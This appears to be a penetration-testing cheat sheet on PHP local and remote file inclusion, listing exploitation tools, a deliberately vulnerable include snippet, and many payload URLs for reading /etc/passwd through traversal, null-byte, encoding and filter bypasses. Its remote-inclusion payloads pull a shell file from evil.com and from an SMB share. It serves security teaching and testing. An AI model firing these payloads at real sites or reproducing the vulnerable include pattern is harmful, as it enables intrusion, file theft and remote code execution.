6.4 KiB
File Inclusion
A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
Summary
Tools
- P0cL4bs/Kadimus (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.
- D35m0nd142/LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
- kurobeats/fimap - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
- lightos/Panoptic - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
- hansmach1ne/LFImap - Local File Inclusion discovery and exploitation tool
Local File Inclusion
File Inclusion Vulnerability should be differentiated from Path Traversal. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the page
parameter to include local or remote files, leading to unauthorized access or code execution.
<?php
$file = $_GET['page'];
include($file);
?>
In the following examples we include the /etc/passwd
file, check the Directory & Path Traversal
chapter for more interesting files.
http://example.com/index.php?page=../../../etc/passwd
Null Byte
⚠️ In versions of PHP below 5.3.4 we can terminate with null byte (%00
).
http://example.com/index.php?page=../../../etc/passwd%00
Example: Joomla! Component Web TV 1.0 - CVE-2010-1470
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
Path Truncation
On most PHP installations a filename longer than 4096
bytes will be cut off so any excess chars will be thrown away.
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Remote File Inclusion
Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
Remote File Inclusion doesn't work anymore on a default configuration since allow_url_include
is now disabled since PHP 5.
allow_url_include = On
Most of the filter bypasses from LFI section can be reused for RFI.
http://example.com/index.php?page=http://evil.com/shell.txt
Null Byte
http://example.com/index.php?page=http://evil.com/shell.txt%00
Double Encoding
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
Bypass allow_url_include
When allow_url_include
and allow_url_fopen
are set to Off
. It is still possible to include a remote file on Windows box using the smb
protocol.
- Create a share open to everyone
- Write a PHP code inside a file :
shell.php
- Include it
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
Labs
- Root Me - Local File Inclusion
- Root Me - Local File Inclusion - Double encoding
- Root Me - Remote File Inclusion
- Root Me - PHP - Filters
References
- CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018
- Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12
- Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris
- LFI Cheat Sheet - @Arr0way - 24 Apr 2016
- Testing for Local File Inclusion - OWASP - 25 June 2017
- Turning LFI into RFI - Grayson Christopher - 2017-08-14